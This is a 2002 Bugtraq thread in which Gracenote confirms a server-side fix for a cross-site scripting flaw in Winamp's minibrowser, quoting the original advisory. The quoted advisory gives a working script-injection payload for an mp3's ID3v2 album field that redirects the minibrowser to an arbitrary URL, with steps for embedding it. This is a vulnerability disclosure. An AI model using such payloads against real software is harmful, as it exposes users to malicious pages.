[24953] in bugtraq
Re: Winamp: Mp3 file can control the minibrowser
daemon@ATHENA.MIT.EDU (Security)
Wed Apr 3 21:18:52 2002
Message-ID: <200204031449070332.4CE9423E@cracker.globix-sc.cddb.com>
In-Reply-To: <Pine.LNX.4.44.0204031321420.11204-100000@mao.acc.umu.se>
Date: Wed, 03 Apr 2002 14:49:07 -0800
Reply-To: security@gracenote.com
From: "Security" <Security@gracenote.com>
To: "Andreas Sandblad" <sandblad@acc.umu.se>, bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Thank you for your posting of a Cross-Site Scripting issue with the mini-browser that is included with WinAmp 2.78 and above. Gracenote supplies the underlying technology for the mini-browser. We have fixed the encoding issue at the server. Should you find any additional security issues with the mini-browser, please send email to security@gracenote.com.
Thanks to Andreas Sandblad for bringing this to our attention.
Matthew Leeds
VP Operations
Gracenote
www.gracenote.com
*********** REPLY SEPARATOR ***********
On 4/3/2002 at 1:23 PM Andreas Sandblad wrote:
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>Title: Winamp: Mp3 file can control the minibrowser
>Date: [2002-04-3]
>Tested env: Winamp 2.78c, 2.79 with Win2000 Pro
>Impact: A special crafted mp3 file can control the
> minibrowser, such as directing to arbitrary
> webpage possibly containing mallicious
> html code. Also another "call home" issue.
>Status: Winamp contacted over two weeks ago,
> no response.
>Vendor fix: Non. The fix should be on the server side.
>Workaround: Disable minibrowser. _ _
> (enabled by default) o' \,=./ `o
>Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
>---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
>
>PROBLEM:
>Winamp has a built-in minibrowser to show information about songs beeing
>played (enabled by default). For every song currently playing Winamp will
>direct the minibrowser to an url like
>http://info.winamp.com/winamp/WA.html?Alb=&Art=Love
>Project&Cid=winamp&Tid=&Track=Brick
>Winamp gets the title/artist/album information from the ID3v1/ID3v2 tag in
>the mp3 file. The problem is that the html page doesn't filter "<" and ">"
>characters making it possible to inject htmlcode to control the
>minibrowser (yet another CSS problem).
>
>EXPLOIT:
>Every field in the ID3v1 tag is limited to max. 32 bytes so we use the
>ID3v2 tag instead. It seems that Winamp has made some useless efforts to
>stop our attack, namely to convert " and ' to \" and \' (server side).
>This will of course not stop us.
>
>So lets put the following html code in the album field of the ID3v2 tag of
>our mp3-file:
><mp3 id=m src=http://ANYURL><script>location=m.src</script>
>It will direct the user to http://ANYURL on load.
>
>Adding an ID3v2 tag to a mp3 file is very simple. Open the file in Winamp,
>right click on it and choose "File info". Unmark the ID3v1 tag and mark
>ID3v2. Add the html code in the album field. Sometimes Winamp will
>complain when creating the ID3v2 tag with some characters. Then you simply
>have to hexedit the mp3 file instead.
>
> _ _
> o' \,=./ `o
> (o o)
>---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
>Andreas Sandblad, student in Engineering Physics
>at the University of Umea, Sweden.
>---------------------------------------------------------------
